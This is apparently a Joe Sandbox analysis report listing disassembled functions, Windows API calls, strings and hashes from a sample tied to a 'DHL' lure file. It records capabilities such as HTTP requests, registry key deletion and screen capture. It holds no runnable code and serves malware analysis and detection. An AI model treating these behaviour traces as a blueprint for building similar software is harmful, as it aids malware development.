Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 99026ce25763aa264ec2f6cefa3401b74d61e361617613236f5e1b2723f3db7d
Instruction ID: 2a93fdde84f804f9c7278927b783ae3447c302c1ff425e8983cf85de8698efd3
Opcode Fuzzy Hash: 99026ce25763aa264ec2f6cefa3401b74d61e361617613236f5e1b2723f3db7d
Instruction Fuzzy Hash: 17713571640655BEFB258F69DC59FAEBF68FF05324F204206F524AA1E0C7B1AD60CB90

Function 00236CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00236DEB

Part of subcall function 001A6B57: _wcslen.LIBCMT ref: 001A6B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00236E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00236E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00236E94
DestroyWindow.USER32(?), ref: 00236EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,001A0000,00000000), ref: 00236EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00236EFD
GetDesktopWindow.USER32 ref: 00236F16
GetWindowRect.USER32(00000000), ref: 00236F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00236F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00236F4D

Part of subcall function 001B9944: GetWindowLongW.USER32(?,000000EB), ref: 001B9952

Strings

tooltips_class32, xrefs: 00236E58, 00236EDD
0, xrefs: 00236D98

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 88af7822adeb90cc609ae506435abf516fa11f1bc95782569f67ae2f2c56fdad
Instruction ID: 9ba5f95db3a7112175784da77d9259453cdf6b686c0b8335be2f224883c7610e
Opcode Fuzzy Hash: 88af7822adeb90cc609ae506435abf516fa11f1bc95782569f67ae2f2c56fdad
Instruction Fuzzy Hash: 1B718CB4114241AFDB25CF18EC48F6ABBF9FB89304F14441DFA8997260C770A956CF21

Function 0021C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0021C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0021C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0021C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0021C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0021C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0021C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0021C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0021C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0021C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0021C5F0
InternetCloseHandle.WININET(00000000), ref: 0021C5FB

Strings

, xrefs: 0021C575

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 85d2bbe1243b992e193c8fd5f758c8ec0a5a77d180f99922cf406cd33016ad93
Instruction ID: 0d6beb8b6b9ca06f01d0b6432f31ef44282d8f92787e21e365f4d2fbc73a437e
Opcode Fuzzy Hash: 85d2bbe1243b992e193c8fd5f758c8ec0a5a77d180f99922cf406cd33016ad93
Instruction Fuzzy Hash: 83517DB5550205BFDB218F60DD48ABBBBFDFF18754F20441AF945E6210DB30E9949B60

Function 0023856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00238592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002385A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002385AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002385BA
GlobalLock.KERNEL32(00000000), ref: 002385C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002385D7
GlobalUnlock.KERNEL32(00000000), ref: 002385E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002385E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002385F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0023FC38,?), ref: 00238611
GlobalFree.KERNEL32(00000000), ref: 00238621
GetObjectW.GDI32(?,00000018,?), ref: 00238641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00238671
DeleteObject.GDI32(?), ref: 00238699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002386AF

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 531d3fb15b5c32ce670d2d3bd7e37cfb92da177a9148ff0127adb9053c263d09
Instruction ID: 5ea0707384f1acb1206aa1d1f0bd36c37c289cb8e1c43c4038dcbfb592cc1339
Opcode Fuzzy Hash: 531d3fb15b5c32ce670d2d3bd7e37cfb92da177a9148ff0127adb9053c263d09
Instruction Fuzzy Hash: B441FAB5600205AFDB119FA5DC8DEAB7BBCEF89B11F108059F909EB260DB709911DF60

Function 002114BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00211502
VariantCopy.OLEAUT32(?,?), ref: 0021150B
VariantClear.OLEAUT32(?), ref: 00211517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 002115FB
VarR8FromDec.OLEAUT32(?,?), ref: 00211657
VariantInit.OLEAUT32(?), ref: 00211708
SysFreeString.OLEAUT32(?), ref: 0021178C
VariantClear.OLEAUT32(?), ref: 002117D8
VariantClear.OLEAUT32(?), ref: 002117E7
VariantInit.OLEAUT32(00000000), ref: 00211823

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00211625
Default, xrefs: 002116AF

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: c228f4037b53653ea483e411082c3a543bdca23cbf57743b78e54edb49596b9e
Instruction ID: 2a678ef03b18fdcc72a5caf074e9d2f57d444937ac7846c487f10d7b774d6be2
Opcode Fuzzy Hash: c228f4037b53653ea483e411082c3a543bdca23cbf57743b78e54edb49596b9e
Instruction Fuzzy Hash: 57D10231620115EBDB109F64E884BFEB7F6BF65700F60805AE646AB280DB70DCB1DB52

Function 0022B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 001A9CB3: _wcslen.LIBCMT ref: 001A9CBD

Part of subcall function 0022C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0022B6AE,?,?), ref: 0022C9B5
Part of subcall function 0022C998: _wcslen.LIBCMT ref: 0022C9F1
Part of subcall function 0022C998: _wcslen.LIBCMT ref: 0022CA68
Part of subcall function 0022C998: _wcslen.LIBCMT ref: 0022CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0022B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0022B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0022B80A
RegCloseKey.ADVAPI32(?), ref: 0022B87E
RegCloseKey.ADVAPI32(?), ref: 0022B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0022B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0022B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0022B922
FreeLibrary.KERNEL32(00000000), ref: 0022B983
RegCloseKey.ADVAPI32(00000000), ref: 0022B994

Strings

RegDeleteKeyExW, xrefs: 0022B8FE
advapi32.dll, xrefs: 0022B8ED

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 7790ac5b81ef7366c365d1347708edd851a6c36906c6274307f90aa195dabc51
Instruction ID: 9db573f5715f4d1b03e43098ff73dfae816c07e8be77e264c566802e1a795936
Opcode Fuzzy Hash: 7790ac5b81ef7366c365d1347708edd851a6c36906c6274307f90aa195dabc51
Instruction Fuzzy Hash: F2C1BD35218212AFD715DF54D494F2ABBE5FF85318F14845CF49A8B2A2CB71EC86CB82

Function 0022255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 002225D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 002225E8
CreateCompatibleDC.GDI32(?), ref: 002225F4
SelectObject.GDI32(00000000,?), ref: 00222601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0022266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 002226AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 002226D0
SelectObject.GDI32(?,?), ref: 002226D8
DeleteObject.GDI32(?), ref: 002226E1
DeleteDC.GDI32(?), ref: 002226E8
ReleaseDC.USER32(00000000,?), ref: 002226F3

Strings

(, xrefs: 0022268D

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 25823cec79530c90c4cbca266db6ff46fcef3679b85119f5c6d430166c532d83
Instruction ID: 9f46de9d16a1764c84acd5c4810d9c57c5034ea5d977ec087af676a80194b56e
Opcode Fuzzy Hash: 25823cec79530c90c4cbca266db6ff46fcef3679b85119f5c6d430166c532d83
Instruction Fuzzy Hash: BD611376D10219EFCF14CFE4E888AAEBBB9FF48310F208429E955A7250D371A951CF60

Function 001DDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 001DDAA1

Part of subcall function 001DD63C: _free.LIBCMT ref: 001DD659
Part of subcall function 001DD63C: _free.LIBCMT ref: 001DD66B
Part of subcall function 001DD63C: _free.LIBCMT ref: 001DD67D
Part of subcall function 001DD63C: _free.LIBCMT ref: 001DD68F
Part of subcall function 001DD63C: _free.LIBCMT ref: 001DD6A1
Part of subcall function 001DD63C: _free.LIBCMT ref: 001DD6B3
Part of subcall function 001DD63C: _free.LIBCMT ref: 001DD6C5
Part of subcall function 001DD63C: _free.LIBCMT ref: 001DD6D7
Part of subcall function 001DD63C: _free.LIBCMT ref: 001DD6E9
Part of subcall function 001DD63C: _free.LIBCMT ref: 001DD6FB
Part of subcall function 001DD63C: _free.LIBCMT ref: 001DD70D
Part of subcall function 001DD63C: _free.LIBCMT ref: 001DD71F
Part of subcall function 001DD63C: _free.LIBCMT ref: 001DD731

_free.LIBCMT ref: 001DDA96

Part of subcall function 001D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001DD7D1,00000000,00000000,00000000,00000000,?,001DD7F8,00000000,00000007,00000000,?,001DDBF5,00000000), ref: 001D29DE
Part of subcall function 001D29C8: GetLastError.KERNEL32(00000000,?,001DD7D1,00000000,00000000,00000000,00000000,?,001DD7F8,00000000,00000007,00000000,?,001DDBF5,00000000,00000000), ref: 001D29F0

_free.LIBCMT ref: 001DDAB8
_free.LIBCMT ref: 001DDACD
_free.LIBCMT ref: 001DDAD8
_free.LIBCMT ref: 001DDAFA
_free.LIBCMT ref: 001DDB0D
_free.LIBCMT ref: 001DDB1B
_free.LIBCMT ref: 001DDB26
_free.LIBCMT ref: 001DDB5E
_free.LIBCMT ref: 001DDB65
_free.LIBCMT ref: 001DDB82
_free.LIBCMT ref: 001DDB9A

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 27f66aa4772b55e71ddbd3a41c828195c6f7593c6a07653b9533621dc09aaed2
Instruction ID: 9b7933bdaeb997513925d9ca33b0d3709cb9355373d98399e0d47684c830b447
Opcode Fuzzy Hash: 27f66aa4772b55e71ddbd3a41c828195c6f7593c6a07653b9533621dc09aaed2
Instruction Fuzzy Hash: DA315C316047059FEB25AA39E845B6A77E9FF21318F15841BE459D7391DF31EC80DB20

Function 0020365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0020369C
_wcslen.LIBCMT ref: 002036A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00203797
GetClassNameW.USER32(?,?,00000400), ref: 0020380C
GetDlgCtrlID.USER32(?), ref: 0020385D
GetWindowRect.USER32(?,?), ref: 00203882
GetParent.USER32(?), ref: 002038A0
ScreenToClient.USER32(00000000), ref: 002038A7
GetClassNameW.USER32(?,?,00000100), ref: 00203921
GetWindowTextW.USER32(?,?,00000400), ref: 0020395D

Strings

%s%u, xrefs: 00203734

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 9fd7708b046e242496e72927a5f5d0e8bf1523d2ffbf26b048a4472f5b7cb763
Instruction ID: b522ad6ce437b3103ea85233496350b3ae0a3f226a7d822ed7b8d1d98d542490
Opcode Fuzzy Hash: 9fd7708b046e242496e72927a5f5d0e8bf1523d2ffbf26b048a4472f5b7cb763
Instruction Fuzzy Hash: 5591BB7121470BAFD719DF24C885BAAB7ACFF44310F108629F999D2192DB30EA65CB91

Function 00204954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00204994
GetWindowTextW.USER32(?,?,00000400), ref: 002049DA
_wcslen.LIBCMT ref: 002049EB
CharUpperBuffW.USER32(?,00000000), ref: 002049F7
_wcsstr.LIBVCRUNTIME ref: 00204A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00204A64
GetWindowTextW.USER32(?,?,00000400), ref: 00204A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00204AE6
GetClassNameW.USER32(?,?,00000400), ref: 00204B20
GetWindowRect.USER32(?,?), ref: 00204B8B

Strings

ThumbnailClass, xrefs: 00204A6F, 00204AF1

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: d4bfea2fc22a8cb324dd9650365eb5425a6fa986e5fcf60342ff13852d1dd200
Instruction ID: 5aa9c43c2dc7af5669e5470424cfdaae85bfe53cba872c5a5b65db9bcfbf3842
Opcode Fuzzy Hash: d4bfea2fc22a8cb324dd9650365eb5425a6fa986e5fcf60342ff13852d1dd200
Instruction Fuzzy Hash: 9991BCB11183069BDB04EE14C985FAA77E8FF84318F04846AFE859A0D6DB30ED55CBA1

Function 00238D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001B9BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00238D5A
GetFocus.USER32 ref: 00238D6A
GetDlgCtrlID.USER32(00000000), ref: 00238D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00238E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00238ECF
GetMenuItemCount.USER32(?), ref: 00238EEC
GetMenuItemID.USER32(?,00000000), ref: 00238EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00238F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00238F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00238FA1

Strings

0, xrefs: 00238E9F

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: cd3fa53a07d09e4c6f06599756305a3989a50b248d85781577d0c199f071185d
Instruction ID: dfd7a6b070acc20c07ce81f116194431f4a9de68cc39fd3a7a3925a9a70c26bc
Opcode Fuzzy Hash: cd3fa53a07d09e4c6f06599756305a3989a50b248d85781577d0c199f071185d
Instruction Fuzzy Hash: C681C2B15243029FD710DF24D888EABBBE9FF88714F14091DF985AB291DB70D911CBA2

Function 0020DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0020DC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0020DC46
_wcslen.LIBCMT ref: 0020DC50
_wcsstr.LIBVCRUNTIME ref: 0020DCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0020DCBC

Strings

\VarFileInfo\Translation, xrefs: 0020DCB4
04090000, xrefs: 0020DCF2
DefaultLangCodepage, xrefs: 0020DD1F
%u.%u.%u.%u, xrefs: 0020DD9A
StringFileInfo\, xrefs: 0020DC8F

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 2590c9dcc61fe5a10bbdd8010d0012e4da75e84351879714bfe2b59cd6232b18
Instruction ID: bf8601912881f9894d6a93798b111af11b4a0e3d4a51cb8daeb0ae9ddb9ce248
Opcode Fuzzy Hash: 2590c9dcc61fe5a10bbdd8010d0012e4da75e84351879714bfe2b59cd6232b18
Instruction Fuzzy Hash: 8941D2729503017ADB14ABB49C47EFF776CEF66710F100069F900A6183EB70DA2187A4

Function 0022CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0022CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0022CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0022CD48

Part of subcall function 0022CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0022CCAA
Part of subcall function 0022CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0022CCBD
Part of subcall function 0022CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0022CCCF
Part of subcall function 0022CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0022CD05
Part of subcall function 0022CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0022CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0022CCF3

Strings

RegDeleteKeyExW, xrefs: 0022CCC9
advapi32.dll, xrefs: 0022CCB8

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: e026b12b9aa866dfa2194b1c27c9eda1c42293d8d7dda7d220eadad1c1f57753
Instruction ID: c2733779d86df0ee9fd1a498be7cfcfb1083e50670b4d800a4d2ef1d3f5004c0
Opcode Fuzzy Hash: e026b12b9aa866dfa2194b1c27c9eda1c42293d8d7dda7d220eadad1c1f57753
